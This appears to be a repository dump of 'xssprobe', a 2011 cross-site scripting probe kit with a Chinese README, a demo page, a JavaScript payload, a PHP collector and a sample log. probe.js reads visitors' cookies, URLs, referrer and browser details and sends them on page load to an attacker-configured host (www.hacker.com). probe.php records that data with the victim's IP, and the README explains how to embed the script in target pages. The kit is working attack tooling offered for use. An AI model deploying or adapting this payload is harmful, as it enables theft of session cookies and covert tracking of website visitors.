xssprobe demo page<script>alert(1)</script>

├── README ├── demo.html ├── probe.js ├── probe.php └── probe_data.html /README: -------------------------------------------------------------------------------- 1 | xssprobe 2 | 3 | xss探针脚本，用于获取被跨页面的通用数据。 4 | 5 | 使用说明： 6 | 7 | 1、修改probe.js： 8 | // 获取隐私信息的服务端页面，这里需配置为自己的probe.php网址 9 | http_server = "http://www.hacker.com/xssprobe/probe.php?c="; 10 | 2、在目标页面嵌入probe.js文件，可以参考demo.html（xssprobe demo page）:) 11 | 12 | 13 | by evilcos@gmail.com 14 | 15 | ChangeLog 16 | ===================================== 17 | 18 | 2011/8/22 19 | v1 能获取的数据如下： 20 | browser, ua, lang, referer, location, toplocation, cookie, domain, title, screen, flash -------------------------------------------------------------------------------- /demo.html: -------------------------------------------------------------------------------- 1 | 2 | xssprobe demo page<script>alert(1)</script> 3 | 4 | 5 | 6 |

xssprobe demo

7 | 8 | 结果页面：./xssprobe/probe_data.html
9 | 获取数据样例： 10 | 11 | { 12 | 'browser': { 13 | 'name': 'mozilla', 14 | 'version': '6.0' 15 | }, 16 | 'ua': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0', 17 | 'lang': 'zh-CN', 18 | 'referrer': 'http://www.0x37.com/xssprobe/', 19 | 'location': 'http://www.0x37.com/xssprobe/demo.html', 20 | 'toplocation': 'http://www.0x37.com/xssprobe/demo.html', 21 | 'cookie': 'xssprobe=1; popunder=yes; popundr=yes; setover18=1', 22 | 'domain': 'www.0x37.com', 23 | 'title': 'xssprobe demo page<script>alert(1)</script>', 24 | 'screen': '1440x900', 25 | 'flash': '10.3 r181' 26 | } 27 | 28 | 29 |
30 | --
by evilcos@gmail.com 2011/8/22 31 | 32 | -------------------------------------------------------------------------------- /probe.js: -------------------------------------------------------------------------------- 1 | /* 2 | xssprobe 3 | by evilcos@gmail.com | @xeyeteam 4 | */ 5 | 6 | // 获取隐私信息的服务端页面，这里需配置为自己的probe.php网址 7 | http_server = "http://www.hacker.com/xssprobe/probe.php?c="; 8 | 9 | var info = {}; // 隐私信息字典 10 | info.browser = function(){ 11 | ua = navigator.userAgent.toLowerCase(); 12 | var rwebkit = /(webkit)[ \/]([\w.]+)/; 13 | var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/; 14 | var rmsie = /(msie) ([\w.]+)/; 15 | var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/; 16 | var match = rwebkit.exec( ua ) || 17 | ropera.exec( ua ) || 18 | rmsie.exec( ua ) || 19 | ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) || 20 | []; 21 | return {name: match[1] || "", version: match[2] || "0"}; 22 | }(); 23 | info.ua = escape(navigator.userAgent); 24 | info.lang = navigator.language; 25 | info.referrer = escape(document.referrer); 26 | info.location = escape(window.location.href); 27 | info.toplocation = escape(top.location.href); 28 | info.cookie = escape(document.cookie); 29 | info.domain = document.domain; 30 | info.title = document.title; 31 | info.screen = function(){ 32 | var c = ""; 33 | if (self.screen) {c = screen.width+"x"+screen.height;} 34 | return c; 35 | }(); 36 | info.flash = function(){ 37 | var f="",n=navigator; 38 | if (n.plugins && n.plugins.length) { 39 | for (var ii=0;ii=2;ii--) { 49 | try { 50 | var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+"');"); 51 | if (fl) { 52 | f=ii + '.0'; 53 | break; 54 | } 55 | } 56 | catch(e) {} 57 | } 58 | } 59 | return f; 60 | }(); 61 | 62 | function json2str(o) { 63 | var arr = []; 64 | var fmt = function(s) { 65 | if (typeof s == 'object' && s != null) return json2str(s); 66 | return /^(string|number)$/.test(typeof s) ? "'" + s + "'" : s; 67 | } 68 | for (var i in o) arr.push("'" + i + "':" + fmt(o[i])); 69 | return '{' + arr.join(',') + '}'; 70 | } 71 | 72 | window.onload = function(){ 73 | var i = json2str(info); 74 | new Image().src = http_server + i; 75 | } 76 | -------------------------------------------------------------------------------- /probe.php: -------------------------------------------------------------------------------- 1 | $value){ 44 | $content[$key] = stripslashes($value); 45 | } 46 | }else{ 47 | $content = stripslashes($content);} 48 | }else{} 49 | return $content; 50 | } 51 | 52 | if (!empty($_REQUEST["c"])){ 53 | $curtime = date("Y-m-d H:i:s"); 54 | $ip = get_real_ip(); 55 | $useragent = get_user_agent(); 56 | $referer = get_referer(); 57 | $data = $_REQUEST["c"]; 58 | if(!file_exists("probe_data.html")){ 59 | $fp = fopen("probe_data.html", "a+"); 60 | fwrite($fp, 'probe data'); 61 | fclose($fp); 62 | } 63 | $fp = fopen("probe_data.html", "a+"); 64 | fwrite($fp, "".htmlspecialchars(quotes($ip))." | $curtime
UserAgent: ".htmlspecialchars(quotes($useragent))."
Referer: ".htmlspecialchars(quotes($referer))."
DATA: ".htmlspecialchars(quotes($data))."

"); 65 | fclose($fp); 66 | } 67 | 68 | ?> -------------------------------------------------------------------------------- /probe_data.html: -------------------------------------------------------------------------------- 1 | probe data127.0.0.1 | 2011-08-22 14:36:08
UserAgent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Referer: http://www.0x37.com/xssprobe/demo.html
DATA: {'browser':{'name':'mozilla','version':'6.0'},'ua':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0','lang':'zh-CN','referrer':'http://www.0x37.com/xssprobe/','location':'http://www.0x37.com/xssprobe/demo.html','toplocation':'http://www.0x37.com/xssprobe/demo.html','cookie':'xssprobe=1; popunder=yes; popundr=yes; setover18=1','domain':'www.0x37.com','title':'xssprobe demo page<script>alert(1)</script>','screen':'1440x900','flash':'10.3 r181'}

--------------------------------------------------------------------------------